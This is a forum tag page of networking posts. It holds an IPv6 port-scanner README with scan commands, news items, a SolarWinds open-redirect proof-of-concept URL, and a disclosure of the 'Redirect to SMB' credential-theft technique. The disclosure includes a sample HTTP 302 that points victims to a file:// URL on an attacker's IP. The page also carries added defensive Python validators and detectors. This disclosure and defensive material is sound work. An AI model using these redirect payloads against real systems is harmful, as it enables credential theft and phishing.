Showing results for tags 'network'.
  1. fi6s: Fast IPv6 scanner

     fi6s is an IPv6 port scanner designed to be fast. This is achieved by sending and processing raw packets asynchronously. The design and goal are pretty similar to Masscan, though it is not as full-featured yet.

     Building
     Building should be fairly easy on up-to-date distros. On Ubuntu 16.04 (xenial) it looks like this:

       # apt install gcc make git libpcap-dev
       $ git clone https://github.com/sfan5/fi6s.git
       $ cd fi6s
       $ make BUILD_TYPE=release

     The scanner executable will be ready at ./fi6s. Note that fi6s is developed solely on Linux, thus it probably won't compile on non-Linux OSs (notably Windows).

     Usage
     Usage is pretty easy; fi6s will try to auto-detect the dirty technical details (source/dest MAC, source IP).

       # ./fi6s -p 80,8000-8100 2001:db8::/120

     This example will:
       • scan the 2001:db8::/120 subnet (256 addresses in total)
       • scan port 80 and ports 8000 to 8100 (102 ports in total)
       • output scan results to stdout in the "list" format

     There are more different ways of specifying an address range to scan; if you aren't sure what's about to happen, invoke fi6s with --echo-hosts and it will print every host that would've been scanned. For advanced features please consult the output of ./fi6s -h.

     Grabbing banners
     Since fi6s has its own TCP stack, the OS stack needs to be disabled to avoid interference with banner grabbing (RST packets). This is most easily done using ip6tables and a constant --source-port. Banner grabbing is then enabled by passing --banners:

       # ip6tables -A INPUT -p tcp -m tcp --dport 12345 -j DROP
       # ./fi6s -p 22 --banners --source-port 12345 2001:db8::/120

     Download: fi6s-master.zip or: git clone https://github.com/sfan5/fi6s.git
     Source
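The README above explains how a port specification such as -p 80,8000-8100 and a prefix such as 2001:db8::/120 combine into the scan scope (102 ports x 256 addresses). The following is an added example, not part of fi6s and not the project's own parser: it expands a fi6s-style port list with input validation, computes the scope from an IPv6 prefix, and lists the first hosts the way a --echo-hosts dry run would, so the scope can be checked before any packet is sent. The function names are mine.

```python
"""Added example (not fi6s code): parse a fi6s-style port specification
and an IPv6 prefix and report the scan scope before scanning."""
import ipaddress


def parse_ports(spec):
    """Expand a spec like "80,8000-8100" into a sorted list of unique ports.
    Rejects empty entries, ports outside 1-65535 and reversed ranges."""
    ports = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            raise ValueError("empty port entry")
        if "-" in item:
            lo_s, hi_s = item.split("-", 1)
            lo, hi = int(lo_s), int(hi_s)
        else:
            lo = hi = int(item)
        if not (1 <= lo <= hi <= 65535):
            raise ValueError("bad port range: %r" % item)
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def scan_scope(port_spec, prefix):
    """Return host count, port count and total probes for one prefix.
    Only IPv6 prefixes are accepted, matching the scanner's scope."""
    net = ipaddress.ip_network(prefix, strict=False)
    if net.version != 6:
        raise ValueError("fi6s scans IPv6 only")
    ports = parse_ports(port_spec)
    return {
        "hosts": net.num_addresses,
        "ports": len(ports),
        "probes": net.num_addresses * len(ports),
    }


def echo_hosts(prefix, limit=5):
    """First `limit` addresses that would be scanned (like --echo-hosts)."""
    net = ipaddress.ip_network(prefix, strict=False)
    return [str(addr) for addr, _ in zip(net, range(limit))]


if __name__ == "__main__":
    # The README's own example: 102 ports over a /120 (256 addresses).
    print(scan_scope("80,8000-8100", "2001:db8::/120"))
    print(echo_hosts("2001:db8::/120"))
```

Reversed ranges and ports outside 1-65535 raise instead of silently producing an empty or oversized scope, which is the failure a dry run is meant to catch.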
  2. Hi, this is a tutorial intended for those who want to get started with networking, but also for experienced people, as a short reminder of some very important things.

     Packet: a packet is a unit of data that is routed between a region and a destination on the internet.
     Network Interface: an internet interface refers to the program's interface to the network card (SOFTWARE->HARDWARE). As an example (taken from another website): if you have 2 network cards in your machine, each can be controlled and configured with the program associated with it.
     LAN (Local Area Network): the LAN refers to a small portion of the internet that cannot be accessed by most of those browsing the internet. For example, at the computers in the computer science lab at my university, all the computers are linked in a network (LAN).
     WAN (Wide Area Network): the WAN is a network much more widespread than the LAN.
     Protocol: a protocol is a set of rules that defines a language through which devices can communicate. Some examples of protocols are: TCP, UDP, IP, ICMP. Through these protocols work: HTTP, SSH, TLS/SSL, FTP and many others.
     Port: a port is an address opened on a single computer that is tied to a particular piece of software. Example: HTTP has port 80.
     Firewall: a program that decides what traffic a certain computer receives or sends out.
     NAT: a way of "translating" the requests that enter a server toward a server or a piece.
     VPN (Virtual Private Network): it creates a secure path through which you can browse over a public network; more precisely, it hides your real IP, replacing it with the one at the endpoint you connect to.

     If I got anything wrong, please correct me! I'll be back shortly (a few days) with a tutorial about protocols (what they do, types of protocols, how they help us, how they work).
  3. A new social network has been launched, vowing more transparency, security, and privacy than Facebook and other social media giants. Backed by the hacktivist group Anonymous, it will encrypt all messages, shielding data from governments and advertisers. At first glance, Minds.com appears similar to any other social network. It provides a person's followers with the latest updates, allowing their friends to comment and promote posts. But the major difference exists behind the scenes. Minds.com doesn't aim to profit from gathering data. In fact, its goal is the opposite – to encrypt all messages so they can't be read by governments or advertisers. The social network will also reward users for interacting with posts. This can be done by voting, commenting or uploading. The rewards will come in the form of points, which can be exchanged for “views” of your posts. Simply put, the more active you are, the more your posts will be promoted by the social network.
     More here: Anonymous backs new encrypted social network to rival Facebook — RT News
     https://www.minds.com/
  4. The nation’s first ever criminal case involving a hijacked wireless Internet connection came to light this month, prompting online security experts to warn that home Wi-Fi routers may be open to attack if not properly protected. Users need to set a password and switch on encryption, or their network can be hacked within minutes by someone close enough to eavesdrop on the wireless signal, such as a user in an adjacent apartment, said Yuichi Nozawa, a consultant with the government-affiliated Information-technology Promotion Agency (IPA), a body that advises on digital security. Cracking the security itself is relatively simple for one common form of encryption and can be done using free software. The IPA delivered the warning last Friday, a day after the rearrest of a man suspected of tapping into a nearby Wi-Fi network in Matsuyama, Ehime Prefecture. Hirofumi Fujita, 30, is separately on trial for allegedly stealing ¥16 million by obtaining online banking IDs and passwords as well as sending computer viruses to gain unauthorized remote access to other people’s computers. Moreover, the agency warned that hackers can use hijacked wireless networks to hide their identities, leading “even ordinary people with no criminal intention” to become the main suspects in cybercrimes, Nozawa said Monday. He said police sometimes identify suspects by the Internet access point used. A further problem lies in the fact that it is not easy for ordinary users to detect if their network has been hacked, he said. Many users remain unaware of the risks. In 2014, the IPA reported that more than 50 percent of households either had not set password protection on their home wireless network or were unsure whether it was active. But even if a wireless network is password-protected, it needs to use a newer form of encryption, as older ones can be cracked fairly easily. 
Older routers may offer Wired Equivalent Privacy (WEP) encryption as the default setting, which Nozawa said can be hacked. The alleged Ehime hacker is suspected of using this technique, deploying software that came as a free gift with an IT security magazine. Instead, Nozawa recommends using Wi-Fi Protected Access II, better known as WPA2, a higher form of encryption and one usually offered by newer network devices. The IPA recommends contacting manufacturers’ support teams to find out how to configure the security settings, as the procedure varies from device to device. Source
  5. Virtual private network Hola has downplayed concerns that its 47 million users could become part of a botnet. A botnet is a network of hijacked computers that can be used for criminal activity without the knowledge of their owners. Hola says it has always been open about sending other data via users' devices when they are not in use. However, in a blog post chief executive Ofer Vilenski acknowledged the firm had "made some mistakes". The Israeli company offers a free service but on the condition it can use customers' bandwidth "securely". Mr Vilenski said he had wrongly assumed that describing the network as "peer-to-peer" had made that clear. It also operates a commercial network called Luminati, which can be used to "route data through any of our millions of IPs [computer addresses] that are located in every city around the world", according to its website. The website goes on to say the Luminati network consists of "personal PCs, laptops and mobile devices of participating users". They are the private devices of Hola users, it has been claimed. "The concern with Hola is that it appears to operate like a botnet, and one that is potentially insecure at that," said cybersecurity expert Prof Alan Woodward, from Surrey University. "There is mounting anecdotal evidence that the network is being used as a real botnet. "I haven't seen that in practice but the way in which the service can use your machine appears to have the potential to do something like that." People often use virtual private networks to access internet content that is unavailable in their home country - such as video streaming services Netflix and the BBC iPlayer - but most VPNs are not free. Ofer Vilenski said in his blog post that Hola generated revenue by offering the VPN for "legitimate commercial purposes" only. 
"We have a record of the real identification and traffic of the Luminati users, such that if a crime is committed, we can report this to the authorities, and thus the criminal is immediately identified," he wrote. Last week, the founder of message board 8Chan said the site had suffered a distributed denial of service (DDOS) attack - when a website is overwhelmed by false requests from computers - that could be traced back to the Luminati network. Mr Vilenski accepted that a spammer had "passed through our filters" to use the service but added that the account had been terminated and "necessary measures" put in place. He said that the firm would shortly begin a "bug bounty programme" offering rewards for people who identified security weaknesses in Hola and Luminati products. Prior to the blog post hundreds of people had already posted on community site Reddit, calling for users to uninstall the network over fears that their devices could unintentionally be used for criminal activity, and Android users have been leaving warning messages in the review section of the app on Google's Play Store. In the FAQ section on its website, updated on 29 May, Hola explains how its "peer-to-peer" model works. "When your device is not in use, other packets of information from other people may be routed through your device," it says. "Hola does this securely, not allowing any access to any of your information. Your device is used only as a router." It also says that users of its premium service, for a monthly fee of $4.99 (£2.28), are not part of the network. Source
  6. # Affected software: SolarWinds Network Performance Monitor
     # Type of vulnerability: url redirection
     # URL: http://www.solarwinds.com/
     # Discovered by: provensec
     # Website: provensec.com
     # version: N/A
     # Proof of concept
     http://oriondemo.solarwinds.com/Orion/Login.aspx?ReturnUrl=//google.com
     Source
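The proof of concept above works because //google.com is a protocol-relative URL: it starts with a slash, so a check that only asks "does ReturnUrl start with /?" accepts it, and the browser then resolves it to an external host. The following is an added example, not SolarWinds code, showing that naive check next to a hardened one for a login return-URL parameter. The function names, the example.invalid origin and the /Orion/ fallback are assumptions made for the illustration.

```python
"""Added example (not SolarWinds code): validating a post-login
ReturnUrl so that it can only point back into the same site."""
from urllib.parse import urlsplit, urljoin

# Assumed origin used only to resolve the candidate against our own host.
OUR_ORIGIN = "https://example.invalid/"


def naive_is_local(return_url):
    """The broken check: '//google.com' passes because it starts with '/'."""
    return return_url.startswith("/")


def is_safe_return_url(return_url):
    """Accept only same-site relative paths.

    Rejects absolute URLs, protocol-relative (//host) URLs, backslash
    variants that browsers normalise to '/', and control characters
    (header-injection material)."""
    if not return_url:
        return False
    if any(ord(c) < 0x20 or c == "\x7f" for c in return_url):
        return False
    # Browsers treat '\' like '/', so normalise before inspecting.
    normalised = return_url.replace("\\", "/")
    if not normalised.startswith("/") or normalised.startswith("//"):
        return False
    parts = urlsplit(normalised)
    # A relative path must carry neither a scheme nor a network location.
    if parts.scheme or parts.netloc:
        return False
    # Final check: resolving against our origin must stay on our host.
    resolved = urlsplit(urljoin(OUR_ORIGIN, normalised))
    return resolved.netloc == urlsplit(OUR_ORIGIN).netloc


def safe_redirect_target(return_url, default="/Orion/"):
    """Return the validated target, or the assumed default landing page."""
    return return_url if is_safe_return_url(return_url) else default


if __name__ == "__main__":
    for candidate in ("//google.com", "/\\google.com", "https://google.com/",
                      "/Orion/Default.aspx?x=1"):
        print("%-28s naive=%-5s hardened=%s" % (
            candidate, naive_is_local(candidate), is_safe_return_url(candidate)))
```

The last resolution step is the one that matters: rather than enumerating bad prefixes, it asks what host the browser would actually end up on, so path-only inputs stay local and everything else falls back to the default landing page.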
  7. SPEAR - Redirect to SMB
     April 13, 2015 By Brian Wallace

     We’ve uncovered a new technique for stealing sensitive login credentials from any Windows PC, tablet or server, including ones running previews of the yet-to-be-released Windows 10 operating system. Software from at least 31 companies including Adobe, Apple, Box, Microsoft, Oracle and Symantec can be exploited using this vulnerability, which we have dubbed Redirect to SMB. Carnegie Mellon University CERT disclosed the vulnerability to the public today (#VU672268), following six weeks of working with vendors to help them mitigate the issue.

     Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password. We are publishing a white paper that describes the issue in detail, and offers mitigation methods for both developers and computer users. For technical details, download the Redirect To SMB white paper.

     Original Attack
     The Redirect to SMB attack builds on a vulnerability discovered in 1997 by Aaron Spangler, who found that supplying URLs beginning with the word “file” (such as file://1.1.1.1/) to Internet Explorer would cause the operating system to attempt to authenticate with an SMB server at the IP address 1.1.1.1. It’s a serious issue because stolen credentials can be used to break into private accounts, steal data, take control of PCs and establish a beachhead for moving deeper into a targeted network. These “file” URLs could be provided as an image, iframe, or any other web resource resolved by the browser.

     We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Surely enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server.

     [Figure: RedirectToSMB-Diagram-1]

     While conducting previous research on network protocols, we had experimented with redirecting ordinary HTTP requests to web servers to identify new attacks. So we were curious to see what threats SMB posed when combined with redirects. We created an HTTP server in Python that answered every request with a simple HTTP 302 status code to redirect clients to a file:// URL, and using that we were able to confirm that an http:// URL could lead to an authentication attempt from the OS.

       GET / HTTP/1.1
       Accept: text/html, application/xhtml+xml, */*
       Accept-Language: en-US
       User-Agent: Mozilla/5.0,( Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
       Accept-Endoding: gzip, deflate
       Host: 192.168.36.207
       DNT: 1
       Connection: Keep-Alive

       HTTP/1.1 302 Found
       Content-Type: text/html
       Location: file://192.168.36.207/mitmproxy-identifier
       Content-Length: 0

     [Figure: RedirectToSMB-Diagram-02]

     Increased Attack Surface
     We identified four commonly used Windows API functions that allow for redirection from HTTP/HTTPS to SMB. Early testing found that they are used by a wide range of software features such as updaters and usage reporting tools. This discovery opened up a wide range of new attack methods. When combined with a man-in-the-middle attack, an attacker can force authentication attempts with an SMB server using susceptible applications and services that transmit data over HTTP or HTTPS.

     [Figure: RedirectToSMB-Diagram-03]

     Affected Applications
     We tested dozens of applications in our lab, uncovering 31 vulnerable software packages, which we disclosed to CERT at Carnegie Mellon University on Feb. 27, 2015. They include:
       • Widely Used Applications: Adobe Reader, Apple QuickTime and Apple Software Update (which handles the updating for iTunes)
       • Microsoft Applications: Internet Explorer, Windows Media Player, Excel 2010, and even Microsoft Baseline Security Analyzer
       • Antivirus: Symantec’s Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus
       • Security Tools: .NET Reflector, Maltego CE
       • Team Tools: Box Sync, TeamViewer
       • Developer Tools: Github for Windows, PyCharm, IntelliJ IDEA, PHP Storm, JDK 8u31’s installer

     Impact
     Redirect to SMB is most likely to be used in targeted attacks by advanced actors because attackers must have control over some component of a victim’s network traffic. Malicious ads could also be crafted that would force authentication attempts from IE users while hiding malicious behavior from those displaying the advertising. Less sophisticated attackers could launch Redirect to SMB attacks on shared WiFi access points at locations such as coffee shops from any computer, including mobile devices. We successfully tested this attack on a home network using a Nexus 7 loaded with all required tools.

     Examples
     The following examples show different attacks that could be conducted. In order to effectively demonstrate attack scenarios, the conditions have been simplified. The following are the IP addresses of the computers in the examples:
       • 192.168.36.207 – The Attacker
       • 192.168.36.247 – The Victim
       • 192.168.36.128 – The Router/Internet Gateway
     The tools in the examples are as follows:
       • SMBTrap2
       • SMBTrap-mitmproxy-inline.py
       • MITMProxy
       • Zarp
     Additional attack examples are discussed in the white paper.
     Attacking AVG via ARP Poisoning
     Attacking Microsoft Baseline Security Analyzer via modified DNS record

     Encrypted Credentials
     While the user credentials sent over SMB are commonly encrypted, the encryption method used was devised in 1998 and is weak by today’s standards. A stronger hashing algorithm being used on these credentials would decrease the impact of this issue, but not as much as disabling automatic authentication with untrusted SMB servers. With roughly $3,000 worth of GPUs, an attacker could crack any 8-character password consisting of letters (upper and lower case) as well as numbers in less than half a day.

     Mitigations
     Microsoft has yet to release a patch to fix the Redirect to SMB vulnerability. The simplest workaround is to block outbound traffic from TCP 139 and TCP 445 -- either at the endpoint firewall or at the network gateway’s firewall (assuming you are on a trusted network). The former will block all SMB communication, which may disable other features that depend on SMB. If the block is done at the network gateway’s firewall, SMB features will still work inside the network, but it will prevent authentication attempts with destinations outside the network. See the white paper for other mitigation steps.

     Microsoft did not resolve the issue reported by Aaron Spangler in 1997. We hope that our research will compel Microsoft to reconsider the vulnerabilities and disable authentication with untrusted SMB servers. That would block the attacks identified by Spangler as well as the new Redirect to SMB attack.

     NO-MERCY Me & i & My self -> lIKE mICROSOFT :)
     Source ; SPEAR - Redirect to SMB
     & yOU Can See this Post too ; 18-year-old Unpatched Vulnerability Affects All Versions of Microsoft Windows
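The post shows the whole attack hinging on one observable: a 3xx response whose Location header points at file:// (or a UNC path), which the Windows URL APIs then follow into an SMB authentication. The following is an added example, not code from the Cylance post or the white paper, of a detector for that pattern that could run over responses seen at an egress proxy or IDS tap; it parses the response head, recognises file:// and \\host\share targets (including percent-encoded ones), and reports the SMB host so it can be blocked on TCP 139/445 as the Mitigations section advises. The sample response is constructed to match the one in the post; function names are mine.

```python
"""Added example (not from the Cylance post): flag HTTP redirects whose
target would turn a plain http:// fetch into an SMB authentication."""
from urllib.parse import urlsplit, unquote

# Constructed sample, matching the 302 shown in the post above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Content-Type: text/html\r\n"
    "Location: file://192.168.36.207/mitmproxy-identifier\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_response_head(raw):
    """Return (status_code, headers) from a raw HTTP response.
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def smb_target(location):
    """Return the SMB host a Location value would contact, or None.

    Handles file://host/share, percent-encoded forms, and UNC \\host\share.
    A file:/// URL with an empty host is a local path, not an SMB target."""
    loc = unquote(location.strip())
    if loc.startswith("\\\\"):
        host = loc[2:].split("\\", 1)[0].split("/", 1)[0]
        return host or None
    parts = urlsplit(loc)
    if parts.scheme.lower() == "file" and parts.netloc:
        return parts.hostname
    return None


def detect_redirect_to_smb(raw):
    """Return a finding dict for a redirect-to-SMB response, else None."""
    status, headers = parse_response_head(raw)
    if not 300 <= status < 400 or "location" not in headers:
        return None
    host = smb_target(headers["location"])
    if host is None:
        return None
    return {
        "status": status,
        "location": headers["location"],
        "smb_host": host,
        # Matches the workaround in the post: stop SMB leaving the network.
        "mitigation": "block outbound TCP 139/445 to %s" % host,
    }


if __name__ == "__main__":
    print(detect_redirect_to_smb(SAMPLE_RESPONSE))
```

An ordinary redirect to an https:// URL produces no finding, and a redirect into a local file:/// path is deliberately ignored, since no network authentication is triggered; only a target with a host part is reported.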
  8. Intrusion systems have been the subject of considerable research for decades to improve the inconsistencies and inadequacies of existing methods, from basic detectability of an attack to the prevention of computer misuse. It remains a challenge still today to detect and classify known and unknown malicious network activities through identification of intrusive behavioral patterns (anomaly detection) or pattern matching (misuse or signature-based detection). Meanwhile, the number of network attack incidents continues to grow. Protecting a computer network against attacks or cybersecurity threats is imperative, especially for companies that need to protect not only their own business data but also sensitive information of their clients as well as of their employees. It is not hard to see why even just one breach in data security from a single intrusion of a computer network could wreak havoc on the entire organization. Not only would it question the reliability of the networks’ infrastructure, but it could also seriously damage the business’s reputation. An organization’s first defense against breaches is a well-defined corporate policy and management of systems, as well as the involvement of users in protecting the confidentiality, integrity, and availability of all information assets. Security awareness training is a baseline for staff to gain the knowledge necessary to deter computer breaches and viruses, mitigate the risks associated with malicious attacks, and defend against constantly evolving threats. Users’ awareness and strict IT policies and procedures can help defend a company from attacks, but when a malicious intrusion is attempted, technology is what helps systems administrators protect IT assets. When it comes to perimeter data security, traditional defense mechanisms should be in layers: firewalls, intrusion detection systems (IDS) and intrusion prevention systems (IPS) can be used. 
Research and new developments in the field of IDPS (Intrusion Detection and Prevention System) prove different approaches to anomaly and misuse detection can work effectively in practical settings, even without the need of human interaction/supervision in the process. Several case studies emphasize that the use of Artificial Neural Networks (ANN) can establish general patterns and identify attack characteristics in situations where rules are not known. A neural network approach can adapt to certain constraints, learn system characteristics, recognize patterns and compare recent user actions to the usual behavior; this allows resolving many issues/problems even without human intervention. The technology promises to detect misuse and improve the recognition of malicious events with more consistency. A neural network is able to detect any instances of possible misuse, allowing system administrators to protect their entire organization through enhanced resilience against threats. This article explores Artificial Intelligence (AI) as a means to solve the difficulties in identifying intrusions of insecure networks, such as the Internet, and discusses the use of artificial neural networks (ANN) for effective intrusion detection to detect patterns that separate attacks from genuine traffic. It will clarify why ANN technology offers a promising future in the identification of instances of misuse against computer systems. Furthermore, the article will also point out the different directions in which research on neural networks concentrate and the developments and expected future in the intrusion detection and prevention (IDPS) field. 
IDS & IPS Technology: Detection and Prevention Techniques

With computer intrusions—the unauthorized access or malicious use of information resources—becoming more common and a growing challenge to overcome, IT professionals have come to rely more on detection and prevention technologies to protect availability of business-critical information resources and to safeguard data confidentiality and integrity. IDS tools sniff network packet traffic in search of interferences from external sources and can spot a hacker attempting to gain entry; they are designed to detect threats, misuse or unauthorized access to a system or network and are able to analyze system events for signs of incidents. Using both hardware and software, IDSs can detect anything that is suspicious either on a network or host; they then create alarms that system administrators can review to spot possible malicious entries. Intrusion detection systems (IDS) can be classified as:
  • Host based or Network based, with the former checking individual machines’ logs and the latter analyzing the content of network packets;
  • Online or Offline, capable of flagging a threat in real-time or after the fact to alert of a problem;
  • Misuse-based or Anomaly-based, either specifically checking a deviation from a routine behavior or comparing activities with normal, known attackers’ behavior.
While an IDS is designed to detect attacks and alert humans to any malicious events to investigate, an IPS is used to prevent malicious acts or block suspicious traffic on the network.
There are four different types of IPS: network-based intrusion prevention system (NIPS) that looks at the protocol activity to spot suspicious traffic; wireless intrusion prevention system (WIPS) that analyzes wireless networking protocols and is so important in the BYOD and mobile-centric world; network behavior analysis (NBA) that can spot attacks that create unusual traffic, such as distributed denial of service (DDoS) attacks, and it can use anomaly-based detection and stateful protocol analysis; and host-based intrusion prevention system (HIPS) that can be installed on single machines and can use signature-based and anomaly-based methods to detect problems. IDS and IPS tools are often used concurrently, as they are not mutually exclusive. Thus IDPS can offer twice the protection. Security technologist and chief technology officer of Co3 Systems Bruce Schneier mentions, “Good security is a combination of protection, detection, and response.” That just happens to be what IDPS does; it is deployed for information gathering, logging, detection and prevention. These tools provide threat identification capabilities, attack anticipation, and more. Having a network-based IDPS (NIDPS) with signature-based and anomaly-based detection capabilities allows inspecting the content of all the traffic that traverses the network. NIDPS are essential network security appliances that help in maintaining the security goals. They are highly used, as Indraneel Mukhopadhyay explains, for “identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators.” The all familiar Snort—an open-source NIDPS—is a highly used free threat intelligence program, created by Martin Roesch in 1998, that is capable of real-time traffic analysis and packet logging; it utilizes a rules-based detection engine to look for anomalous activity. What makes it a popular choice is its easy-to-use rule language. 
It can protect even the largest enterprise networks. Snort is an IP-centric program; administrators can view system security logs and find any irregularities or issues relating to things such as improper access patterns. Snort is said to be the most widely deployed intrusion prevention system in the world. Deploying IDS and IPS devices requires a specialized skill set to ensure they properly identify abnormal traffic and alert the network administrator as needed. Along with proper configuration to a predefined rule set, provided by the administrator, these devices need to be fine-tuned (as new threats are discovered) in order to weed out false positives and be adjusted to specific network parameters (when the infrastructure has been altered) to maximize accuracy. Once the type of IDPS technology has been selected, it is key to determine how many components (sensors, agents) will need to be deployed to function accurately to capture security issues, process events and alert appropriate personnel of suspicious activities. Direct network monitoring by IDPS components like inline sensors between the firewall and the Internet border router is essential to achieve detection and prevention of malicious activity, such as denial of service attacks committed by an intruder. IDPS agents installed on endpoints can not only monitor the current network but also can assign appropriate priorities to alerts.

Past and Present of IDSs

IDPSs are able to monitor the events of interest on the systems and/or networks and are then able to identify possible incidents, log information about them, and attempt to stop common attacks and report them to security administrators.
In the past, Intrusion Detection and Prevention (IDPS) has either been signature-based (able to check activity against known attackers’ patterns, the signature), anomaly-based (also referred to as heuristic, that alerts when traffic and activity are not normal), or based on stateful protocol analysis that looks at the “state” in a connection and “remembers” significant events that occur. These methods are effective but do have some downfalls. IDSs are known to have two main problems: the number of alarms generated and the need for tuning. Anomaly-based detection, for example, needs training and if issues arise during the training period a malicious behavior might be “learned” as legitimate by the system; it’s also prone to many false positives. When analysis is based on rules provided by a vendor or an administrator, instead, updates must be frequent to ensure the proper functioning of the system. The number of alarms generated (many being false) can overwhelm system security managers and prevent them from quickly identifying real ones. The continuous tuning of the intrusion to detect the slightest of variances and training required in order to maintain sufficient performance remains an issue. With a growing number of intrusion events, there is the need to use innovative intrusion detection techniques for critical infrastructure network protection. Research has concentrated on Artificial Neural Networks (ANNs) that can provide a more flexible approach to intrusion prevention in terms of learning. As the need for reliable automatic IDPS builds up, for it to gain acceptance as a viable alternative, it needs to function at a sufficient level of accuracy. That is where Neural Networks and Artificial Intelligence can play an effective role in the improvement of ID systems with the ability to learn from previous episodes of intrusion to identify new types of attack with less analyst interaction with the ID itself. 
In fact, information system experts believe that Artificial Intelligence (AI) can provide significant improvements to IDS/IPS systems, especially in terms of effectiveness and decreased false positive/negative rates, a major issue in intrusion management.

Next Generation Intrusion Detection and Prevention (IDPS)

Due to a new generation of hackers that are better organized and equipped than in the past, to get past perimeter security, it is clear that a different approach is required, says Joshua Crumbaugh, lead penetration tester at Tangible Security, Inc., NagaSec. As per the DRAFT Special Publication 800-94 Revision 1, Guide to …, the Next-Generation IDPS for host and network-based deployment options will have automated identification, location, isolation, and resolution of threats in real-time. A GCN staff post, “What’s next in cybersecurity automation,” provides insight on the Enterprise Automated Security Environment (EASE) concept for “shared situational awareness in cyber-relevant time” and, with the concerted efforts of government and private sector interests, the concept may foster continuous innovation for cyberspace defense across the board. Other than EASE, the US Government has already evaluated other options to defend against cyber-attacks that mine homeland security. It pursued, for example, a project to develop a smart network of sensors (named Einstein) to detect cyber-attacks against critical infrastructures. IPS/IDS has changed, as research shows, with AI techniques that have improved IDSs by making them capable of detecting both current and future intrusion attacks while triggering fewer false positives and negatives. New ANNIDS (Neural networks applied to IDS) techniques have been able to improve the way detection systems are trained to recognize patterns, conduct problem solving and fault diagnosis too.
In today’s world, there is the need “for building high-speed, reliable, robust and scalable ANN-based network intrusion detection and prevention system that is highly useful for [humankind] and organizations,” Mukhopadhyay says. Neural network based AIs are able to discover emergent collective properties that are too complex to be noticed by either humans or other computer techniques. AI based techniques are used to classify behavior patterns of a user and an intruder in a way that minimizes false alarms from happening, explains Archit Kumar, India, an M.Tech Student, Department of CSE, in a research paper for IJARCSMS. An IDS based on ANN uses algorithms that can analyze the captured data and judge whether the data is an intrusion or not by means of behavioral analysis of the neural computation during both learning and recall. Although ANNIDS’ main drawbacks are lower detection precision for low-frequency attacks, and weaker detection stability in the beginning, it is a suitable solution for intrusion detection and network security, says Suresh Kashyap, an Indian research scholar at the Dr. C.V. Raman University. He adds that ANNIDS can be trained and tested by customized datasets, enabling it to identify known and unknown (new) attacks with increasing accuracy when other methods fail.

Current AI techniques for improving automation of the intrusion detection process are not easily deployable in real life, yet many experiments and tests have been carried out with results showing ANNs capable of detecting intrusive activity in a distributed environment to provide local “threat-level” monitoring of computer DDoS attacks before the successful completion of an intrusion. ANNs are great in terms of learning capabilities and effectiveness in capturing anomalies in activities, but also have some significant downfalls, such as, for example, the requirement of high computational resources.
Researchers have been working on resolving this issue by trying to find a way to help ANN systems process info faster and more effectively. An approach using AI techniques combined with genetic algorithms and fuzzy logic, for instance, proved well suited for detecting malicious behavior in distributed computer systems. Research has also concentrated on the possibility of clustering data into subgroups using fuzzy clustering and then using a different ANN on each set. Results are obtained faster and are then aggregated to have a complete picture. Another method explored more recently is deploying new ANN-based intelligent hybrid IDS models for anomaly detection that involve network- and host-based technologies under a single management console. These are also applicable to many environments: from Grid and Cloud Computing to mobile and network computers. In such an architecture, a Distributed Intrusion Detection System (DIDS) that relies on network and host based sensors is apt to increase the efficiency of the system, yielding fast results of abnormal data determined by multiple heterogeneous recognition engines and management components to solve security issues.

Conclusion

Whether it is through a hybrid IDS using honey pot technology and anomaly detection or artificial neural network (ANN) based IDS techniques, it is essential to detect and prevent attacks immediately as attempted. Information security practitioners suggest organizations are confident that the security control mechanisms in place are sufficient for the protection of computer data and programs, but apparently, as per the PwC findings from the 2014 US State of Cybercrime Survey, a good majority of them fail to assess for threats or place emphasis on prevention mechanisms. What’s more, they also lack the ability to diagnose and troubleshoot less sophisticated attacks and have yet to consider where IDS/IPS fits in their security plan.
Both system solutions work together and form an integral part of a robust network defense solution. As per the annual Worldwide Infrastructure Security Report (WISR) that provides insight into the Global Threat Landscape, organizations will face even more concerns regarding APT, so they ought to step up their network security defenses with near-real-time intrusion detection to defend critical data and applications from today’s sophisticated attacks. The new reality in IT security is that network breaches are inevitable, and the ability to monitor and control access, behavior patterns and misuse relies upon intrusion detection and prevention methods for them to be more quickly identified and more effectively addressed. An IDS/IPS is a must-have device; an ANN model based on ESNN learning patterns and classifying intrusion data packets is an effective approach. The main advantages of ANNs over traditional IDSs are their abilities to learn, classify and process information faster, as well as their ability to self-organize. For these reasons, Neural Networks can increase the accuracy and efficiency of IDSs and AI techniques can improve IDS/IPS effectiveness.

References

Brecht, D. (2010, April 15). Network Intrusion Detection Systems: a 101. Retrieved from What is a Network Intrusion Detection System (NIDS)?
Compare Business Products (2014, March 18). Security: IDS vs. IPS Explained. Retrieved from Security: IDS vs. IPS Explained | Reviews, Comparisons and Buyer's Guides
GCN. (2014, December 9). What’s next in cybersecurity automation. Retrieved from What’s next in cybersecurity automation -- GCN
Infosecurity Magazine. (2011, October 21). Small enterprises are suffering more intrusions, survey finds. Retrieved from Small enterprises are suffering more intrusions, survey finds - Infosecurity Magazine
InfoSight Inc. (n.d.). Intrusion Detection (IDS) & Intrusion Prevention (IPS).
Retrieved from Intrusion Detection (IDS) & Intrusion Prevention (IPS) – InfoSight Inc
Kashyap, S. (2013, May). Importance of Intrusion Detection System with its Different approaches. Retrieved from http://www.ijareeie.com/upload/may/24_Importance.pdf
Kumar, A. (2014, May). Intrusion detection system using Expert system (AI) and […]. Retrieved from http://www.ijarcsms.com/docs/paper/volume2/issue5/V2I5-0064.pdf
